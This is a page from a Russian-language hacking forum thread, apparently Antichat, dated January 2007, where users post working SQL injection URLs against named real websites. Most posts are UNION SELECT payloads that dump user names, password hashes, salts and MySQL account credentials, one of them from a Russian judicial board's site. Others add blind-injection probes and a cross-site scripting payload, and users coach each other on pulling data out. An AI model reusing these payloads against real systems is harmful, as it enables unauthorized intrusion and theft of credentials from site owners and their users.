ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #231  
Старый 09.01.2007, 16:20
Аватар для kair
kair
Участник форума
Регистрация: 12.10.2006
Сообщений: 158
Провел на форуме:
668286

Репутация: 187
Отправить сообщение для kair с помощью ICQ
По умолчанию

http://filmmakers.node9.org/author.php?name_id=-5'%20union%20select%201,VERSION(),3,4,5,6,0,6,DATA BASE(),USER(),9/*
помогите с table informations =(
 
Ответить с цитированием

  #232  
Старый 09.01.2007, 17:00
Аватар для Termin@L
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

http://www.a1tv.ru/AOpenBands.php?Band=-1+union+select+null,2,concat(memberName,char(58),p asswd,char(58),PasswordSalt),4,5+from+smf_members/*
A-ONE
 
Ответить с цитированием

  #233  
Старый 09.01.2007, 19:30
Аватар для DIAgen
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332

Репутация: 1276


По умолчанию

http://user.kz/files/cifry.php?sid=23692+union+select+null,null,null,nu ll,null,null,null/* Вот только обидно не выводится не чего из таблици;(

P.S. просто из-за внемательности
Цитата:
http://user.kz/files/cifry.php?sid=2+union+select+1,2,99999,4,5,7,8/*
вот только косяк в том, что из базы беруться цифры и потому уже идет генерация ресунка, т.е цифры служат именами для файлов, там уже не чего нельзя сделать!

Последний раз редактировалось DIAgen; 09.01.2007 в 20:38..
 
Ответить с цитированием

  #234  
Старый 09.01.2007, 20:36
Аватар для c411k
c411k
Reservists Of Antichat - Level 6
Регистрация: 16.07.2005
Сообщений: 653
Провел на форуме:
8854279

Репутация: 2727


По умолчанию

Цитата:
Сообщение от DIAgen  
http://user.kz/files/cifry.php?sid=23692+union+select+null,null,null,nu ll,null,null,null/* Вот только обидно не выводится не чего из таблици;(
перебирай
http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1, 1)))>1)
http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1, 1)))>100)
__________________
ПИУ-ПИУ...
 
Ответить с цитированием

  #235  
Старый 09.01.2007, 21:20
Аватар для DIAgen
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332

Репутация: 1276


По умолчанию

Цитата:
Сообщение от c411k  
перебирай
http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1, 1)))>1)
http://user.kz/files/cifry.php?sid=23698+and((ascii(substring(user(),1, 1)))>100)
НЕ люблю по символьный перебор потом дам тебе имя таблиц, а то не помню куда закул их, потом выложишь http://forum.antichat.ru/thread28658.html
 
Ответить с цитированием

  #236  
Старый 09.01.2007, 23:22
Аватар для DIAgen
DIAgen
Познавший АНТИЧАТ
Регистрация: 02.05.2006
Сообщений: 1,191
Провел на форуме:
7364332

Репутация: 1276


По умолчанию

Цитата:
http://keep4u.ru/album.php?view=-1'+union+select+1,2,322,4+from+mysql.user/*
Правда не чего интересно!
 
Ответить с цитированием

  #237  
Старый 10.01.2007, 00:47
Аватар для ice1k
ice1k
Постоянный
Регистрация: 01.01.2007
Сообщений: 551
Провел на форуме:
4908597

Репутация: 1866


Отправить сообщение для ice1k с помощью ICQ
По умолчанию

http://www.vkks.ru/second.php?columnValue=-99+union+select+convert(concat(user,0x3a,password) using%20cp1251),2+from+mysql.user/*
Высшая квалификационная коллегия судей
Российской Федерации
 
Ответить с цитированием

  #238  
Старый 10.01.2007, 16:30
Аватар для guest3297
guest3297
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
Провел на форуме:
3887520

Репутация: 2996


По умолчанию

http://www.ugd-soft.ru/?mode=press&id=-1+union+select+1,2,3,4/*
 
Ответить с цитированием

  #239  
Старый 10.01.2007, 22:56
Аватар для *D1VER
*D1VER
Участник форума
Регистрация: 05.12.2006
Сообщений: 112
Провел на форуме:
685950

Репутация: 175
Отправить сообщение для *D1VER с помощью ICQ
По умолчанию

http://www.worthplaying.com/article.php?sid=-1+union+select+1,2,pass,4,name,6,7,111+from+users/*

Чють Чють не ф тему но там же
http://www.worthplaying.com/user.php?op=userinfo&uname=7'%3Cscript%3Ealert()%3 C/script%3E

Последний раз редактировалось *D1VER; 10.01.2007 в 22:59..
 
Ответить с цитированием

  #240  
Старый 11.01.2007, 12:13
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

2Diagen почему же =) можно поля поискать.. не зря таблица юзеры называется..

+ раньше был локал инклуд .. сейчас хз

http://keep4u.ru/album.php?view=-1'+union+select+1,2,convert(user()+using+cp1251),4 +from+users/*
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ